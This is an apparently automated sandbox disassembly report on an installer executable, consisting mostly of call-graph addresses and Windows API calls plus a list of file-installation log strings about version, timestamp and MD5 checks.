475de6 51368->51370 51580 474aac 51368->51580 51599 474e2c 51370->51599 51373 475dec 51374 475f3c 51373->51374 51375 475df9 51373->51375 51377 474d48 18 API calls 51374->51377 51604 488208 51375->51604 51379 475f3a 51377->51379 51382 471e10 34 API calls 51379->51382 51384 475f58 51382->51384 51387 403468 4 API calls 51384->51387 51389 475f65 51387->51389 51390 471e10 34 API calls 51389->51390 51392 475f72 51390->51392 51395 403468 4 API calls 51392->51395 51397 475f7f 51395->51397 51398 471e10 34 API calls 51397->51398 51399 475f8c 51398->51399 51401 403468 4 API calls 51399->51401 51403 475f99 51401->51403 51405 471e10 34 API calls 51403->51405 51406 475fa6 51405->51406 51407 403468 4 API calls 51406->51407 51411 475fb3 51407->51411 51409 44ffc8 4 API calls 51409->51411 51411->51409 51419 475ff1 51411->51419 51635 453068 51411->51635 51681 47435c 39 API calls 51411->51681 51682 408b64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51411->51682 51413 47606b 51417 4760ef 51413->51417 51418 46f554 19 API calls 51413->51418 51684 46dd7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51413->51684 51414 46f554 19 API calls 51414->51419 51415 476173 51416 4761c0 SetErrorMode 51415->51416 51420 476376 51416->51420 51434 476231 51416->51434 51417->51415 51422 46f554 19 API calls 51417->51422 51685 46dd7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51417->51685 51418->51413 51419->51413 51419->51414 51683 46dd7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51419->51683 51431 4763c7 51420->51431 51686 472de4 19 API calls 51420->51686 51422->51417 51423 47644e SetErrorMode 51424 476441 51424->51423 51427 42d29c 6 API calls 51427->51434 51428 471e10 34 API calls 51428->51434 51431->51423 51431->51424 51687 472ec8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51431->51687 51432 42c7f4 5 API calls 51432->51434 51433 42c81c 5 API calls 51433->51434 51434->51420 51434->51427 51434->51428 51434->51432 51434->51433 51645 474eb4 51434->51645 51437 45507c 25 API calls 51436->51437 51438 4744a7 51437->51438 51438->51359 51440 42d6e8 GetWindowsDirectoryA 51439->51440 51441 472136 51440->51441 51442 403468 4 API calls 51441->51442 51443 472143 51442->51443 51444 42d714 GetSystemDirectoryA 51443->51444 51445 47214b 51444->51445 51446 403468 4 API calls 51445->51446 51447 472158 51446->51447 51448 42d740 6 API calls 51447->51448 51449 472160 51448->51449 51450 403468 4 API calls 51449->51450 51451 47216d 51450->51451 51452 472176 51451->51452 51453 472192 51451->51453 51707 42d0bc 51452->51707 51455 403418 4 API calls 51453->51455 51456 472190 51455->51456 51458 4721d7 51456->51458 51715 42c794 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 51456->51715 51688 471fb0 51458->51688 51459 403468 4 API calls 51459->51456 51462 4721b2 51464 403468 4 API calls 51462->51464 51466 4721bf 51464->51466 51465 403468 4 API calls 51467 4721f3 51465->51467 51466->51458 51470 403468 4 API calls 51466->51470 51468 472211 51467->51468 51471 4035d8 4 API calls 51467->51471 51469 471fb0 8 API calls 51468->51469 51472 472220 51469->51472 51470->51458 51471->51468 51473 403468 4 API calls 51472->51473 51474 47222d 51473->51474 51475 472255 51474->51475 51476 42c374 5 API calls 51474->51476 51477 4722bc 51475->51477 51481 471fb0 8 API calls 51475->51481 51478 472243 51476->51478 51479 4722e6 51477->51479 51480 4722c5 51477->51480 51482 4035d8 4 API calls 51478->51482 51485 42c374 5 API calls 51479->51485 51483 42c374 5 API calls 51480->51483 51484 47226d 51481->51484 51482->51475 51486 4722d2 51483->51486 51487 403468 4 API calls 51484->51487 51488 4722f3 51485->51488 51490 4035d8 4 API calls 51486->51490 51491 47227a 51487->51491 51489 4035d8 4 API calls 51488->51489 51492 4722e4 51489->51492 51490->51492 51493 47228d 51491->51493 51716 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51491->51716 51699 472094 51492->51699 51494 471fb0 8 API calls 51493->51494 51497 47229c 51494->51497 51499 403468 4 API calls 51497->51499 51501 4722a9 51499->51501 51500 403418 4 API calls 51502 47231f 51500->51502 51501->51477 51717 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51501->51717 51504 472574 51502->51504 51505 47257c 51504->51505 51505->51505 51719 45191c 51505->51719 51508 403468 4 API calls 51509 4725a9 51508->51509 51510 4034ac 4 API calls 51509->51510 51511 4725b6 51510->51511 51512 403594 4 API calls 51511->51512 51513 4725c4 51512->51513 51514 454e8c 25 API calls 51513->51514 51515 4725cc 51514->51515 51516 4725df 51515->51516 51753 4547b0 6 API calls 51515->51753 51518 42c374 5 API calls 51516->51518 51519 4725ec 51518->51519 51520 4035d8 4 API calls 51519->51520 51521 4725fc 51520->51521 51522 472606 CreateDirectoryA 51521->51522 51523 472610 GetLastError 51522->51523 51545 47266c 51522->51545 51525 44ffc8 4 API calls 51523->51525 51524 4035d8 4 API calls 51527 472681 51524->51527 51526 472628 51525->51526 51754 406cec 19 API calls 51526->51754 51737 47251c 51527->51737 51530 472638 51532 42e5d8 5 API calls 51530->51532 51531 47268e 51742 4557b0 51531->51742 51535 472648 51532->51535 51534 472696 51536 4726bf 51534->51536 51538 4035d8 4 API calls 51534->51538 51537 44ff98 4 API calls 51535->51537 51540 403438 4 API calls 51536->51540 51539 47265d 51537->51539 51541 4726ac 51538->51541 51755 408b90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51539->51755 51543 4726d9 51540->51543 51544 47251c 25 API calls 51541->51544 51546 403438 4 API calls 51543->51546 51547 4726b7 51544->51547 51545->51524 51548 4726e6 51546->51548 51756 45581c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51547->51756 51550 4728a0 51548->51550 51551 42c374 5 API calls 51550->51551 51552 4728cc 51551->51552 51553 4035d8 4 API calls 51552->51553 51554 4728dc 51553->51554 51555 47251c 25 API calls 51554->51555 51556 4728e9 51555->51556 51817 450678 51556->51817 51559 472902 51560 450678 35 API calls 51559->51560 51563 47290f 51560->51563 51562 472948 51565 42e158 2 API calls 51562->51565 51563->51562 51564 4034ac 4 API calls 51563->51564 51564->51562 51566 472957 51565->51566 51567 42e158 2 API calls 51566->51567 51568 472964 51567->51568 51569 472997 GetProcAddress 51568->51569 51570 407878 19 API calls 51568->51570 51571 4729b3 51569->51571 51572 4729bd 51569->51572 51573 47298f 51570->51573 51822 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51571->51822 51575 403418 4 API calls 51572->51575 51821 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51573->51821 51577 4729d2 51575->51577 51578 403418 4 API calls 51577->51578 51579 4729da 51578->51579 51579->51368 51677 474914 31 API calls 51579->51677 51581 42c374 5 API calls 51580->51581 51582 474ad8 51581->51582 51583 4035d8 4 API calls 51582->51583 51584 474ae8 51583->51584 51585 472440 21 API calls 51584->51585 51586 474af6 51585->51586 51587 42e158 2 API calls 51586->51587 51589 474b0e 51587->51589 51588 474b41 51842 459a70 GetProcAddress GetProcAddress GetProcAddress 51588->51842 51589->51588 51590 407878 19 API calls 51589->51590 51592 474b39 51590->51592 51846 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51592->51846 51593 474b4b 51595 474b59 51593->51595 51847 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51593->51847 51597 403438 4 API calls 51595->51597 51598 474b73 51597->51598 51598->51370 51600 474e3d 51599->51600 51601 474e78 51600->51601 51602 474e68 51600->51602 51601->51373 51848 473ae0 6 API calls 51602->51848 51605 488212 51604->51605 51849 4477b0 51605->51849 51638 45307f 51635->51638 51636 403790 4 API calls 51636->51638 51637 406b34 4 API calls 51637->51638 51638->51636 51638->51637 51639 4037d0 4 API calls 51638->51639 51640 4530d4 OpenMutexA 51638->51640 51641 453104 51638->51641 51639->51638 51640->51638 51642 4530e5 CloseHandle 51640->51642 51643 403438 4 API calls 51641->51643 51642->51641 51644 45311e 51643->51644 51644->51411 51646 40364c 4 API calls 51645->51646 51647 474efb 51646->51647 51648 474f13 FindFirstFileA 51647->51648 51649 474f22 51648->51649 51650 474f6f 51648->51650 51653 474f52 FindNextFileA 51649->51653 51651 47508a 51650->51651 51652 474f79 51650->51652 51654 403438 4 API calls 51651->51654 51656 4034ac 4 API calls 51652->51656 51653->51649 51655 474f66 FindClose 51653->51655 51657 4750a7 51654->51657 51655->51650 51658 474f8d 51656->51658 51659 403418 4 API calls 51657->51659 51660 403594 4 API calls 51658->51660 51661 4750af 51659->51661 51662 474f9a 51660->51662 51661->51434 51663 403594 4 API calls 51662->51663 51664 474faa 51663->51664 51665 474fb5 FindFirstFileA 51664->51665 51665->51651 51670 474fc8 51665->51670 51666 475054 FindNextFileA 51668 47506c FindClose 51666->51668 51666->51670 51667 4034ac 4 API calls 51667->51670 51668->51434 51669 403594 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51669->51670 51670->51666 51670->51667 51670->51669 51671 474eb4 4 API calls 51670->51671 51671->51670 51672->51357 51674->51355 51675->51346 51676->51352 51677->51368 51681->51411 51683->51419 51684->51413 51685->51417 51686->51420 51687->51431 51689 42dbbc RegOpenKeyExA 51688->51689 51690 471fd6 51689->51690 51691 471ffc 51690->51691 51692 471fda 51690->51692 51693 403418 4 API calls 51691->51693 51694 42daec 6 API calls 51692->51694 51695 472003 51693->51695 51697 471fe6 51694->51697 51695->51465 51696 471ff1 RegCloseKey 51696->51695 51697->51696 51698 403418 4 API calls 51697->51698 51698->51696 51700 42dbbc RegOpenKeyExA 51699->51700 51701 4720ba 51700->51701 51702 4720eb 51701->51702 51703 42daec 6 API calls 51701->51703 51702->51500 51704 4720d0 51703->51704 51705 42daec 6 API calls 51704->51705 51706 4720e2 RegCloseKey 51705->51706 51706->51702 51708 4038bc 4 API calls 51707->51708 51709 42d0cf 51708->51709 51710 42d0e6 GetEnvironmentVariableA 51709->51710 51714 42d0f9 51709->51714 51718 42d988 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51709->51718 51710->51709 51711 42d0f2 51710->51711 51712 403418 4 API calls 51711->51712 51712->51714 51714->51459 51715->51462 51716->51493 51717->51477 51718->51709 51722 45193c 51719->51722 51721 4516a8 12 API calls 51721->51722 51722->51721 51723 451961 CreateDirectoryA 51722->51723 51728 44ffc8 4 API calls 51722->51728 51734 42e5d8 5 API calls 51722->51734 51735 44ff98 4 API calls 51722->51735 51757 42d7c4 51722->51757 51780 406cec 19 API calls 51722->51780 51781 408b90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51722->51781 51724 4519d9 51723->51724 51725 45196b GetLastError 51723->51725 51726 4034ac 4 API calls 51724->51726 51725->51722 51727 4519e3 51726->51727 51729 403438 4 API calls 51727->51729 51728->51722 51730 4519fd 51729->51730 51732 403438 4 API calls 51730->51732 51733 451a0a 51732->51733 51733->51508 51734->51722 51735->51722 51738 40d0b4 23 API calls 51737->51738 51739 472538 51738->51739 51782 472440 51739->51782 51741 472553 51741->51531 51743 4557c2 51742->51743 51744 4557bc 51742->51744 51747 4034ac 4 API calls 51743->51747 51745 4557d0 51744->51745 51746 4557c0 51744->51746 51749 4034ac 4 API calls 51745->51749 51751 403418 4 API calls 51746->51751 51748 4557ce 51747->51748 51748->51534 51750 4557dc 51749->51750 51750->51534 51752 4557e5 51751->51752 51752->51534 51753->51516 51754->51530 51755->51545 51756->51536 51758 42d0bc 5 API calls 51757->51758 51759 42d7ea 51758->51759 51760 42d7f6 51759->51760 51761 42cbfc 7 API calls 51759->51761 51762 42d0bc 5 API calls 51760->51762 51764 42d842 51760->51764 51761->51760 51763 42d806 51762->51763 51765 42d812 51763->51765 51767 42cbfc 7 API calls 51763->51767 51766 42c6cc 5 API calls 51764->51766 51765->51764 51768 42d837 51765->51768 51771 42d0bc 5 API calls 51765->51771 51770 42d84c 51766->51770 51767->51765 51768->51764 51769 42d6e8 GetWindowsDirectoryA 51768->51769 51769->51764 51772 42c374 5 API calls 51770->51772 51773 42d82b 51771->51773 51774 42d857 51772->51774 51773->51768 51775 42cbfc 7 API calls 51773->51775 51776 4034ac 4 API calls 51774->51776 51775->51768 51777 42d861 51776->51777 51778 403438 4 API calls 51777->51778 51779 42d87b 51778->51779 51779->51722 51780->51722 51781->51722 51789 40cf08 51782->51789 51784 472475 51785 403438 4 API calls 51784->51785 51786 472505 51785->51786 51787 403418 4 API calls 51786->51787 51788 47250d 51787->51788 51788->51741 51794 40cdb8 51789->51794 51791 40cf22 51806 40cef0 51791->51806 51793 40cf3d 51793->51784 51795 40cdc5 51794->51795 51796 40cde1 51795->51796 51797 40ce16 51795->51797 51810 406e44 51796->51810 51814 406e04 CreateFileA 51797->51814 51800 40cde8 51805 40ce0f 51800->51805 51813 408cb0 19 API calls 51800->51813 51801 40ce20 51801->51805 51815 408cb0 19 API calls 51801->51815 51804 40ce47 51804->51805 51805->51791 51807 40cf04 51806->51807 51808 40cef8 51806->51808 51807->51793 51816 40cc20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51808->51816 51811 403750 51810->51811 51812 406e60 CreateFileA 51811->51812 51812->51800 51813->51805 51814->51801 51815->51804 51816->51807 51819 450685 51817->51819 51823 450554 51817->51823 51819->51559 51820 451298 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51819->51820 51820->51559 51821->51569 51822->51572 51824 403750 51823->51824 51825 450571 74D41520 51824->51825 51826 4505f6 51825->51826 51827 45057f 51825->51827 51828 450669 51826->51828 51841 45039c 31 API calls 51826->51841 51829 402648 4 API calls 51827->51829 51828->51819 51831 450586 74D41500 51829->51831 51833 4505aa 74D41540 51831->51833 51836 4505c4 51831->51836 51832 450606 51832->51828 51835 45060f 74D41540 51832->51835 51833->51836 51834 402660 4 API calls 51837 4505ee 51834->51837 51838 450637 51835->51838 51836->51834 51837->51819 51839 402660 4 API calls 51838->51839 51840 450661 51839->51840 51840->51819 51841->51832 51843 459aac 51842->51843 51844 459aca 51842->51844 51843->51844 51845 459abe ISCryptGetVersion 51843->51845 51844->51593 51845->51593 51846->51588 51847->51595 51848->51601 51850 4477b6 51849->51850 52050 446d54 51850->52050 52051 446d5a 52050->52051 52062 433348 52051->52062 52063 43334f 52062->52063 52064 430fac 4 API calls 52063->52064 52065 433370 52064->52065 52066 430fac 4 API calls 52065->52066 52067 43337f 52066->52067 52068 430fac 4 API calls 52067->52068 52069 433392 52068->52069 52070 430fac 4 API calls 52069->52070 52071 4333a1 52070->52071 52072 430fac 4 API calls 52071->52072 52073 4333b0 52072->52073 52098 446210 52073->52098 52076 446210 4 API calls 52077 4333ce 52076->52077 52078 430fac 4 API calls 52077->52078 52079 4333e6 52078->52079 52080 430fac 4 API calls 52079->52080 52081 4333f5 52080->52081 52082 430fac 4 API calls 52081->52082 52083 433404 52082->52083 52104 43fdf8 52083->52104 52099 446216 52098->52099 52100 430fac 4 API calls 52099->52100 52101 44622b 52100->52101 52102 402648 4 API calls 52101->52102 52103 4333bf 52102->52103 52103->52076 52211 4338b8 52104->52211 52212 4312c8 4 API calls 52211->52212 52213 4338de 52212->52213 52214 402648 4 API calls 52213->52214 52215 4338e8 52214->52215 52216 43107c 4 API calls 52215->52216 52217 433931 52216->52217 52218 403418 4 API calls 52217->52218 53605 44a27c 53606 44a282 53605->53606 53607 4158c4 7 API calls 53606->53607 53608 44a297 53607->53608 53609 44a42c 9 API calls 53608->53609 53610 44a2ce 53609->53610 53611 416aba 53612 416b62 53611->53612 53613 416ad2 53611->53613 53630 415294 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53612->53630 53614 416ae0 53613->53614 53615 416aec SendMessageA 53613->53615 53617 416b06 53614->53617 53618 416aea CallWindowProcA 53614->53618 53626 416b40 53615->53626 53627 419fd0 GetSysColor 53617->53627 53618->53626 53621 416b11 SetTextColor 53622 416b26 53621->53622 53628 419fd0 GetSysColor 53622->53628 53624 416b2b SetBkColor 53629 41a658 GetSysColor CreateBrushIndirect 53624->53629 53627->53621 53628->53624 53629->53626 53630->53626 53132 40cd9c 53135 406e94 WriteFile 53132->53135 53136 406eb1 53135->53136 53631 4165bc 53632 416623 53631->53632 53633 4165c9 53631->53633 53638 4164c8 CreateWindowExA 53633->53638 53634 4165d0 SetPropA SetPropA 53634->53632 53635 416603 53634->53635 53636 416616 SetWindowPos 53635->53636 53636->53632 53638->53634 53137 42225c 53138 42226b 53137->53138 53143 4211ec 53138->53143 53142 42228b 53144 42125b 53143->53144 53157 4211fb 53143->53157 53147 42126c 53144->53147 53168 412448 GetMenuItemCount GetMenuStringA GetMenuState 53144->53168 53146 42129a 53150 42130d 53146->53150 53155 4212b5 53146->53155 53147->53146 53149 421332 53147->53149 53148 42130b 53151 42135e 53148->53151 53170 421da4 11 API calls 53148->53170 53149->53148 53152 421346 SetMenu 53149->53152 53150->53148 53158 421321 53150->53158 53171 421134 10 API calls 53151->53171 53152->53148 53155->53148 53161 4212d8 GetMenu 53155->53161 53156 421365 53156->53142 53166 422160 10 API calls 53156->53166 53157->53144 53167 408cb0 19 API calls 53157->53167 53160 42132a SetMenu 53158->53160 53160->53148 53162 4212e2 53161->53162 53163 4212fb 53161->53163 53165 4212f5 SetMenu 53162->53165 53169 412448 GetMenuItemCount GetMenuStringA GetMenuState 53163->53169 53165->53163 53166->53142 53167->53157 53168->53147 53169->53148 53170->53151 53171->53156 53639 434cbc 53640 434cd1 53639->53640 53644 434ceb 53640->53644 53645 4346a4 53640->53645 53651 4346ee 53645->53651 53656 4346d4 53645->53656 53646 403418 4 API calls 53647 434af3 53646->53647 53647->53644 53658 434b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53647->53658 53648 446118 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53648->53656 53649 40375c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53649->53656 53650 402648 4 API calls 53650->53656 53651->53646 53652 4038bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53652->53656 53654 43107c 4 API calls 53654->53656 53655 403468 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53655->53656 53656->53648 53656->53649 53656->53650 53656->53651 53656->53652 53656->53654 53656->53655 53659 43378c 53656->53659 53671 433f50 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53656->53671 53658->53644 53660 433849 53659->53660 53661 4337b9 53659->53661 53690 4336ec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53660->53690 53662 4034ac 4 API calls 53661->53662 53664 4337c7 53662->53664 53665 403790 4 API calls 53664->53665 53669 4337e8 53665->53669 53666 403418 4 API calls 53667 433899 53666->53667 53667->53656 53668 43383b 53668->53666 53669->53668 53672 487ffc 53669->53672 53671->53656 53673 4880cc 53672->53673 53674 488034 53672->53674 53691 447c48 53673->53691 53676 4034ac 4 API calls 53674->53676 53678 48803f 53676->53678 53677 403418 4 API calls 53679 4880f0 53677->53679 53680 4037d0 4 API calls 53678->53680 53684 48804f 53678->53684 53681 403418 4 API calls 53679->53681 53682 488068 53680->53682 53683 4880f8 53681->53683 53682->53684 53685 4037d0 4 API calls 53682->53685 53683->53669 53684->53677 53686 48808b 53685->53686 53687 403790 4 API calls 53686->53687 53688 4880bc 53687->53688 53689 40364c 4 API calls 53688->53689 53689->53673 53690->53668 53692 447c6d 53691->53692 53702 447cb0 53691->53702 53693 4034ac 4 API calls 53692->53693 53695 447c78 53693->53695 53694 447880 6 API calls 53696 447cc4 53694->53696 53699 4037d0 4 API calls 53695->53699 53697 403418 4 API calls 53696->53697 53698 447cf7 53697->53698 53698->53684 53700 447c94 53699->53700 53701 4037d0 4 API calls 53700->53701 53701->53702 53702->53694 53702->53696
                                                                                  APIs
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                  • LocalFileTimeToFileTime.KERNEL32(-00000034,00000004,00000000,004699BD,?,00000000,00469A06,?,00000000,00469B3F,?,00000000,?,00000000,?,0046A4CE), ref: 00468CDE
                                                                                    • Part of subcall function 004529AC: FindClose.KERNEL32(00000000,000000FF,00468CF5,00000000,004699BD,?,00000000,00469A06,?,00000000,00469B3F,?,00000000,?,00000000), ref: 004529C2
                                                                                    • Part of subcall function 00467158: FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00467160
                                                                                    • Part of subcall function 00467158: FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 0046716F
                                                                                    • Part of subcall function 0042C6CC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C6F0
                                                                                    • Part of subcall function 004522DC: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004524B3,?,00000000,00452577), ref: 00452403
                                                                                  Strings
                                                                                  • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00469216
                                                                                  • Time stamp of existing file: (failed to read), xrefs: 00468DC0
                                                                                  • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046927A
                                                                                  • Non-default bitness: 64-bit, xrefs: 00468C38
                                                                                  • Version of our file: (none), xrefs: 00468E85
                                                                                  • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046916C
                                                                                  • Version of existing file: %u.%u.%u.%u, xrefs: 00468F05
                                                                                  • Same version. Skipping., xrefs: 00469065
                                                                                  • Time stamp of our file: (failed to read), xrefs: 00468D30
                                                                                  • Will register the file (a DLL/OCX) later., xrefs: 00469828
                                                                                  • Incrementing shared file count (64-bit)., xrefs: 00469895
                                                                                  • Time stamp of our file: %s, xrefs: 00468D24
                                                                                  • Existing file is a newer version. Skipping., xrefs: 00468F8B
                                                                                  • Couldn't read time stamp. Skipping., xrefs: 004690B5
                                                                                  • Stripped read-only attribute., xrefs: 00469247
                                                                                  • -- File entry --, xrefs: 00468ACB
                                                                                  • Time stamp of existing file: %s, xrefs: 00468DB4
                                                                                  • Failed to strip read-only attribute., xrefs: 00469253
                                                                                  • Dest filename: %s, xrefs: 00468C1D
                                                                                  • .tmp, xrefs: 00469337
                                                                                  • InUn, xrefs: 004694C5
                                                                                  • Will register the file (a type library) later., xrefs: 0046981C
                                                                                  • Incrementing shared file count (32-bit)., xrefs: 004698AE
                                                                                  • Version of our file: %u.%u.%u.%u, xrefs: 00468E79
                                                                                  • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 00469044
                                                                                  • Installing the file., xrefs: 00469289
                                                                                  • , xrefs: 00468F58, 00469120, 0046919E
                                                                                  • User opted not to overwrite the existing file. Skipping., xrefs: 004691CD
                                                                                  • Dest file is protected by Windows File Protection., xrefs: 00468C76
                                                                                  • Dest file exists., xrefs: 00468D44
                                                                                  • Non-default bitness: 32-bit, xrefs: 00468C44
                                                                                  • @, xrefs: 00468B78
                                                                                  • Existing file has a later time stamp. Skipping., xrefs: 0046914F
                                                                                  • Failed to read existing file's MD5 sum. Proceeding., xrefs: 00469050
                                                                                  • Same time stamp. Skipping., xrefs: 004690D5
                                                                                  • Skipping due to "onlyifdoesntexist" flag., xrefs: 00468D57
                                                                                  • Version of existing file: (none), xrefs: 0046907A
                                                                                  • Existing file's MD5 sum matches our file. Skipping., xrefs: 00469035
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$Local$CloseFindFullNamePathQuerySystemValue
                                                                                  • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                  • API String ID: 2131814033-1758470929
                                                                                  • Opcode ID: 39a0414491206912d2fcbc34d38eff1df3b24bacecb2ee6c245e5fab88ad6ef1
                                                                                  • Instruction ID: 6916d3ab28f5b631b46a0c1ecd3bec1804182853bb5c4d26ee01d210db2218a3
                                                                                  • Opcode Fuzzy Hash: 39a0414491206912d2fcbc34d38eff1df3b24bacecb2ee6c245e5fab88ad6ef1
                                                                                  • Instruction Fuzzy Hash: D6829434A042489FDF11DFA5C481BDDBBB5AF05318F1440ABE844BB392E7B99E45CB1A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1515 423b84-423bb8 1516 423bba-423bbb 1515->1516 1517 423bec-423c03 call 423ae0 1515->1517 1518 423bbd-423bd9 call 40b3b4 1516->1518 1523 423c64-423c69 1517->1523 1524 423c05 1517->1524 1544 423bdb-423be3 1518->1544 1545 423be8-423bea 1518->1545 1525 423c6b 1523->1525 1526 423c9f-423ca4 1523->1526 1527 423c0b-423c0e 1524->1527 1528 423cc8-423cd8 1524->1528 1534 423c71-423c79 1525->1534 1535 423f29-423f31 1525->1535 1529 424012-424020 IsIconic 1526->1529 1530 423caa-423cad 1526->1530 1536 423c10 1527->1536 1537 423c3d-423c40 1527->1537 1532 423ce3-423ceb call 42410c 1528->1532 1533 423cda-423cdf 1528->1533 1541 4240ca-4240d2 1529->1541 1549 424026-424031 GetFocus 1529->1549 1538 423cb3-423cb4 1530->1538 1539 42404e-424063 call 4247c8 1530->1539 1532->1541 1546 423cf0-423cf8 call 424154 1533->1546 1547 423ce1-423d04 call 423afc 1533->1547 1550 423e8b-423eb2 SendMessageA 1534->1550 1551 423c7f-423c84 1534->1551 1540 423f37-423f42 call 418158 1535->1540 1535->1541 1552 423c16-423c19 1536->1552 1553 423d6e-423d7e call 423afc 1536->1553 1542 423d21-423d28 1537->1542 1543 423c46-423c47 1537->1543 1565 424065-42406c 1538->1565 1566 423cba-423cbd 1538->1566 1539->1541 1540->1541 1597 423f48-423f57 call 418158 IsWindowEnabled 1540->1597 1563 4240e9-4240ef 1541->1563 1542->1541 1558 423d2e-423d35 1542->1558 1559 423eb7-423ebe 1543->1559 1560 423c4d-423c50 1543->1560 1544->1563 1545->1517 1545->1518 1546->1541 1547->1541 1549->1541 1570 424037-424040 call 41ef6c 1549->1570 1550->1541 1561 423fc2-423fcd 1551->1561 1562 423c8a-423c8b 1551->1562 1554 423d96-423db2 PostMessageA call 423afc 1552->1554 1555 423c1f-423c22 1552->1555 1553->1541 1554->1541 1571 423c28-423c2b 1555->1571 1572 423e1d-423e24 1555->1572 1558->1541 1577 423d3b-423d41 1558->1577 1559->1541 1587 423ec4-423ec9 call 404e6c 1559->1587 1578 423c56-423c59 1560->1578 1579 423db7-423dd7 call 423afc 1560->1579 1561->1541 1583 423fd3-423fe5 1561->1583 1580 423c91-423c94 1562->1580 1581 423fea-423ff5 1562->1581 1574 424083-424096 call 4244a4 1565->1574 1575 42406e-424081 call 42444c 1565->1575 1584 423cc3 1566->1584 1585 424098-42409f 1566->1585 1570->1541 1611 424046-42404c SetFocus 1570->1611 1592 423c31-423c32 1571->1592 1593 423d46-423d54 IsIconic 1571->1593 1594 423e26-423e39 call 423a8c 1572->1594 1595 423e57-423e68 call 423afc 1572->1595 1574->1541 1575->1541 1577->1541 1598 423d83-423d91 call 4240f0 1578->1598 1599 423c5f 1578->1599 1638 423dfb-423e18 call 4239fc PostMessageA 1579->1638 1639 423dd9-423df6 call 423a8c PostMessageA 1579->1639 1603 423c9a 1580->1603 1604 423ece-423ed6 1580->1604 1581->1541 1606 423ffb-42400d 1581->1606 1583->1541 1605 4240c3-4240c4 call 423afc 1584->1605 1601 4240b2-4240c1 1585->1601 1602 4240a1-4240b0 1585->1602 1587->1541 1612 423c38 1592->1612 1613 423d09-423d11 1592->1613 1619 423d62-423d69 call 423afc 1593->1619 1620 423d56-423d5d call 423b38 1593->1620 1642 423e4b-423e52 call 423afc 1594->1642 1643 423e3b-423e45 call 41eed0 1594->1643 1647 423e6a-423e78 call 41ee1c 1595->1647 1648 423e7e-423e86 call 4239fc 1595->1648 1597->1541 1644 423f5d-423f6c call 418158 IsWindowVisible 1597->1644 1598->1541 1599->1605 1601->1541 1602->1541 1603->1605 1604->1541 1626 423edc-423ee3 1604->1626 1634 4240c9 1605->1634 1606->1541 1611->1541 1612->1605 1613->1541 1628 423d17-423d1c call 422bc4 1613->1628 1619->1541 1620->1541 1626->1541 1637 423ee9-423ef8 call 418158 IsWindowEnabled 1626->1637 1628->1541 1634->1541 1637->1541 1660 423efe-423f14 call 412288 1637->1660 1638->1541 1639->1541 1642->1541 1643->1642 1644->1541 1667 423f72-423fbd 